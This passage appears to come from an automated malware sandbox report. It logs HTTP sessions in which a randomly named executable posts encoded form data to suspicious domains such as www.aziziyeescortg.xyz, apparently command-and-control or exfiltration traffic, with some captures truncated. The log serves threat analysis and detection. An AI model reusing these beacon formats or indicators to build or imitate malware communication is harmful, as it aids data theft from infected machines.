                                                                                                            Data Ascii: 9PZt=yb4QGOcDnWALXnQoiTXB5znc48koQJhPjhJcgV6jeSz3baCHjDTnt9aSwylhXxKWxYN4Gb78r5y3o8sHQPJLPyevyG1iFNpx9n6JIjKVU5Hcv2hWBsmIWDaDpV4SZgmchrFf/W8tc7nOYNpWGz6gBnsksXrYpNmHTCnXSVEMaT7EAnm/hmuL7fIjMeNGtYfZdk50VbjexVbUW1WAqdkzfAAjoR6wsFD/+thI5/gyvOSmsmWIe0elanhRtxd7h/LNZnK4URex4YKgn8p3eQbDlo3E6tOOE/W0FVq1wyz+8zBqBb4qMwSWQYGkjTOLol0yImQdJ1veGPgS9I2No3as26FoDW8z2sSPZyvV6VWYLHgceBkMNY2MioISjkzex4gHjzfQ1t5g+vbmroqbww5/tpM3n9Y7j5IjYLvbrymq+JLxev44cUbrTqugTkVY/M27WFU58ikILoAKhkNT7yXb1SLKs48PifJ3ymMR/XXO8iQZ42PI495z4OxqWNLWbB2mDseaZJWSh+i2tVg0rgQWaFKrwmxCxibd/hZ9EAR2OQMY7WnFCcCq5MHpjs7kjNWfa5NGimEeYEiR/khFJqhWRKu8llcs8Rkst4OeBRakJCsCE6qvFcwkHbQHTD7moPc2O/HwKOzNTC0+4qjhxGRJtq7VtR8FNf20onwELGmkVnY2l2XRxs2W8Uozhw4TqRKa10qL7EHE4KYs/Pe0ECHRhJZ82TNnAPVYkFbFPKO4qAVAVTPU5iuPRm8WNR7NhmzPCahj232lC7XZFKLlmnRZdjMrEifde3UZcVZpXOzqBpS6gtbwGIlNdbmQ6rGDJvIGwvqG5ORLyJLftaYuAx9cr5u4TkDXN0aHRVMMS4hjyMFIKpJW09u1oktDSqHGRwaTsWjRLi8dVMcJTLXW/jliZH9bbqDCC7kWPTAFIZaSFdrdcRSUBLegty/NbRxAPNSyob2YILplGLJ19OVyngIFDxMId0QmwDGzpysR735QmlAZbf9 [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.65002584.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:23.198107958 CET487OUTGET /qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:27:23.657279968 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:27:23 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 9973
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Server: hcdn
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: 38368160d7971a8c804011f2240c2ae4-bos-edge2
                                                                                                            Expires: Sat, 11 Jan 2025 03:27:22 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                                            Jan 11, 2025 04:27:23.657371044 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                                            Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                                            Jan 11, 2025 04:27:23.657381058 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                                            Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                                            Jan 11, 2025 04:27:23.657687902 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                            Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                                            Jan 11, 2025 04:27:23.657697916 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                                                            Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                                                            Jan 11, 2025 04:27:23.657707930 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                                            Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                                                            Jan 11, 2025 04:27:23.658134937 CET776INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                                                            Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                                                            Jan 11, 2025 04:27:23.658144951 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                                                                            Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                                                                            Jan 11, 2025 04:27:23.658150911 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                                                                                            Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.650026104.21.32.1801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:28.723066092 CET759OUTPOST /2pcx/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.aziziyeescortg.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.aziziyeescortg.xyz
                                                                                                            Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 51 48 74 4e 33 38 6d 4d 62 73 41 36 7a 63 42 55 6d 38 33 47 58 75 34 76 5a 74 37 4f 38 33 30 31 54 37 55 6e 69 37 51 41 71 6c 38 36 42 33 43 31 6a 2f 31 6d 68 4f 39 73 47 4d 78 43 4d 41 4f 43 69 2f 42 54 52 48 77 4f 6a 5a 66 77 52 6d 4d 70 6c 58 6c 72 47 75 35 59 69 6c 4e 6e 4e 50 2f 48 42 45 65 67 2f 2b 45 39 35 66 48 38 70 37 73 67 36 6e 6e 62 51 31 54 47 6a 4c 4d 41 6d 79 35 53 4d 70 6a 76 62 52 65 57 6c 74 77 2f 32 6c 70 47 55 59 58 52 51 39 43 69 31 5a 79 67 32 41 6e 2b 62 43 39 74 42 44 48 35 4f 79 77 75 4a 43 48 49 6f 44 68 42 74 47 54 7a 78 33 4b 48 6f 56 34 5a
                                                                                                            Data Ascii: 9PZt=btkQLzgK81PCQHtN38mMbsA6zcBUm83GXu4vZt7O8301T7Uni7QAql86B3C1j/1mhO9sGMxCMAOCi/BTRHwOjZfwRmMplXlrGu5YilNnNP/HBEeg/+E95fH8p7sg6nnbQ1TGjLMAmy5SMpjvbReWltw/2lpGUYXRQ9Ci1Zyg2An+bC9tBDH5OywuJCHIoDhBtGTzx3KHoV4Z
                                                                                                            Jan 11, 2025 04:27:29.362637043 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:27:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abixDaLA%2FAyUIyB7Gyp9r7bsVHdCfNHnxwFLzCmZcXEvvlcmZj%2FmhYVVL4VtOY7%2F%2FADde1zJkLznXDNMc%2Fc%2FjPfycCy4aH%2BSHMKmfRWXY%2FhbF8MRphsh8OPQivIXmnOfUbnN2c25nXs6"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cfaf0b578cda-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71
                                                                                                            Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTq
                                                                                                            Jan 11, 2025 04:27:29.362668991 CET224INData Raw: f5 f8 88 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10
                                                                                                            Data Ascii: DPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^
                                                                                                            Jan 11, 2025 04:27:29.362683058 CET170INData Raw: 34 67 70 34 a3 47 09 dd 19 a0 11 af 71 89 55 0b ca e3 b0 4f 14 b3 ab b2 6c 9e e7 8d d1 8c c1 21 4a c6 5e 6d 7a 3a 64 e8 3d f9 d4 89 11 93 f6 b3 66 fc 16 5f e1 3b 76 f0 6d 61 a1 c9 44 db b8 f6 ce a0 08 18 a9 12 72 d2 01 25 b0 12 0c 4f 3f ee b1 57
                                                                                                            Data Ascii: 4gp4GqUOl!J^mz:d=f_;vmaDr%O?Wc+`vN3+ cD]'4v70uB.0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.650027104.21.32.1801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:31.271197081 CET783OUTPOST /2pcx/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.aziziyeescortg.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.aziziyeescortg.xyz
                                                                                                            Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 52 6e 39 4e 31 66 4f 4d 4b 63 41 35 76 73 42 55 70 63 33 4b 58 70 77 76 5a 6f 4c 34 38 43 45 31 54 62 6b 6e 73 66 45 41 72 6c 38 36 4b 58 44 2f 74 66 31 39 68 4f 34 62 47 49 35 43 4d 41 4b 43 69 36 39 54 51 30 5a 38 68 4a 66 79 61 47 4d 72 34 6e 6c 72 47 75 35 59 69 6c 49 43 4e 50 33 48 64 6b 75 67 2b 66 45 2b 30 2f 48 2f 34 37 73 67 2b 6e 6e 41 51 31 54 77 6a 4b 67 36 6d 30 6c 53 4d 6f 54 76 56 6a 6d 56 76 74 77 35 35 46 6f 59 66 62 4b 6f 66 2b 44 41 2b 4b 66 59 32 41 50 4c 54 55 67 33 64 77 48 61 63 69 51 73 4a 41 66 36 6f 6a 68 72 76 47 72 7a 6a 67 47 67 6e 68 64 36 6d 50 7a 6a 71 51 32 48 41 65 73 5a 77 44 42 54 5a 36 4d 65 75 41 3d 3d
                                                                                                            Data Ascii: 9PZt=btkQLzgK81PCRn9N1fOMKcA5vsBUpc3KXpwvZoL48CE1TbknsfEArl86KXD/tf19hO4bGI5CMAKCi69TQ0Z8hJfyaGMr4nlrGu5YilICNP3Hdkug+fE+0/H/47sg+nnAQ1TwjKg6m0lSMoTvVjmVvtw55FoYfbKof+DA+KfY2APLTUg3dwHaciQsJAf6ojhrvGrzjgGgnhd6mPzjqQ2HAesZwDBTZ6MeuA==
                                                                                                            Jan 11, 2025 04:27:31.902353048 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:27:31 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWKTe%2BVKrs8SVuEO1Qixa5Z3DhIs65kYAaMdydSsU%2BEjmJAz1uuiCdHr0tAeoY7l1x1LpMhl5WSYp%2FJAEAmUdbbI3SHT88DvbS6w%2BgPLktX%2BxNIUd1MfjqMaKGx4M7wCmauc9uiEhd96"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cfbeee308cda-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                                            Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDP
                                                                                                            Jan 11, 2025 04:27:31.902371883 CET388INData Raw: d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03
                                                                                                            Data Ascii: bUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUOl


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            35192.168.2.650028104.21.32.180
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:34.380592108 CET1796OUTPOST /2pcx/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.aziziyeescortg.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.aziziyeescortg.xyz
                                                                                                            Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 62 74 6b 51 4c 7a 67 4b 38 31 50 43 52 6e 39 4e 31 66 4f 4d 4b 63 41 35 76 73 42 55 70 63 33 4b 58 70 77 76 5a 6f 4c 34 38 44 51 31 54 6f 73 6e 73 2b 45 41 35 31 38 36 44 33 44 38 74 66 31 38 68 4f 41 66 47 49 38 2f 4d 43 43 43 77 4d 4a 54 59 6c 5a 38 72 4a 66 79 56 6d 4d 32 6c 58 6b 68 47 75 4a 63 69 6c 34 43 4e 50 33 48 64 6d 47 67 34 4f 45 2b 32 2f 48 38 70 37 73 57 36 6e 6d 4f 51 31 37 67 6a 4b 55 71 6e 48 39 53 4d 49 44 76 5a 32 79 56 6e 74 77 37 2b 46 6f 51 66 62 47 4a 66 2b 66 6d 2b 4c 71 51 32 48 2f 4c 43 51 42 74 45 78 7a 4e 66 30 63 4b 56 77 44 51 70 54 31 31 69 6c 72 54 79 52 62 55 70 53 45 58 2b 5a 2f 34 76 52 32 48 4f 50 73 50 32 58 34 79 54 49 6c 35 37 38 79 33 2b 4a 62 4e 56 58 2f 54 66 4c 78 6e 76 2b 44 74 38 6f 72 53 59 30 67 63 43 30 51 43 2f 33 73 44 4b 6c 49 67 36 66 69 4e 64 57 63 78 5a 50 57 54 65 61 71 67 45 7a 75 47 67 41 39 35 76 65 6c 4f 4a 57 71 50 38 67 2f 54 6a 68 6f 54 2f 67 49 44 2b 32 34 33 6a 58 4d 37 70 34 6b 6d 43 6b 55 2b 51 4a 47 72 68 62 49 32 55 [TRUNCATED]
